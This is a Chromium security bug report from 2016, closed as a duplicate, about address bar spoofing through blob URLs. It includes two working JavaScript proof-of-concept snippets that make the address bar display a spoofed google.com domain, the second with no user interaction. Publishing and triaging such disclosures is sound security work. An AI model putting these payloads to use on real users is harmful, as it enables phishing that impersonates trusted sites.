New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 605216 link

Starred by 1 user
Status: Duplicate
Merged: issue 594215
Owner: ----
Closed: Apr 2016
Cc:
emilyschechter@chromium.org
pkasting@chromium.org
palmer@chromium.org
f...@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security



Sign in to add a comment

Adddress bar spoofing via blob URL

Reported by masa....@gmail.com, Apr 20 2016 
UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

Steps to reproduce the problem:
The POC works in Chrome for Windows and Chrome for Android, Chrome for OSX :)

1. Visit POC.html (http://output.jsbin.com/wayojo):
<script>
  function poc(){
    w=window.open('about:blank','_blank');
    w.eval('setTimeout("opener.document.write(/pkav~/);opener.focus();window.close();",2000)');
      setTimeout("location='blob:"+location.protocol+"//"+location.host+"%23.account.google.com/';",1000)
  }
</script>
<button onclick="poc()">Boom!</button>

2. Click button 'Boom!'.
3. Wait 1s, see address bar

What is the expected behavior?
Address Bar display:
blob:http://yourdomain%23.account.google.com/

I think should use be 'account.***' short domain name better effect.

What went wrong?
The right display should be:
blob:http://yourdomain/#.account.google.com/

Maybe :)

Did this work before? No 

Chrome version: 49.0.2623.112  Channel: stable
OS Version: 10
Flash Version: Shockwave Flash 21.0 r0

The POC works in Chrome for Windows and Chrome for Android, Chrome for OSX :)
win.png
25.5 KB View Download
android.jpg
56.0 KB View Download

Comment 1 Deleted

Comment 2 by masa....@gmail.com, Apr 20 2016 

Chrome for iOS is ok.
ios-chrome.PNG
32.8 KB View Download

Comment 3 by masa....@gmail.com, Apr 20 2016 

Or address should display "about:blank".

Comment 4 by vakh@chromium.org, Apr 20 2016

Cc: palmer@chromium.org
palmer@ -- this is reproducible but can you please comment on whether this needs to be addressed or is WAI? Thanks.

Comment 5 by palmer@chromium.org, Apr 21 2016

Cc: pkasting@chromium.org f...@chromium.org emilyschechter@chromium.org
Components: UI>Browser>Omnibox Security>UX
Labels: Security_Severity-Low Security_Impact-Stable
Status: Available (was: Unconfirmed)
We should fix this.

Comment 6 by masa....@gmail.com, Apr 21 2016 

No user interaction POC:
https://output.jsbin.com/rufowucuwi/

<script>
var exp = 'pkavpkavpkav<script>history.replaceState("","","blob:'+location.protocol+'//'+location.host+'%23.google.com//")<\/script>';
location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
</script>

I think it's MODERATE.

Comment 7 by vakh@chromium.org, Apr 21 2016 

 Issue 605400  has been merged into this issue.

Comment 8 by masa....@gmail.com, Apr 21 2016 

@vakh i think  Issue 605400  should be MODERATE vuln.

Comment 9 by mea...@chromium.org, Apr 21 2016 

We have a  bug 594215  open to track this issue.

Comment 10 Deleted

Comment 11 by vakh@chromium.org, Apr 22 2016

Mergedinto: 594215
Status: Duplicate (was: Available)

Comment 12 by masa....@gmail.com, May 20 2016 

Is there any progress?

Comment 13 by mea...@chromium.org, May 20 2016 

I have a plan for  bug 594215 , will send it out soon. But before that I want to finish  bug 606619 .

Comment 14 by masa....@gmail.com, May 20 2016 

So, will I get a bug bounty?

Comment 15 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 16 by lafo...@chromium.org, Dec 9 2016

Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label
Project Member

Comment 17 by sheriffbot@chromium.org, Apr 22 2017

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment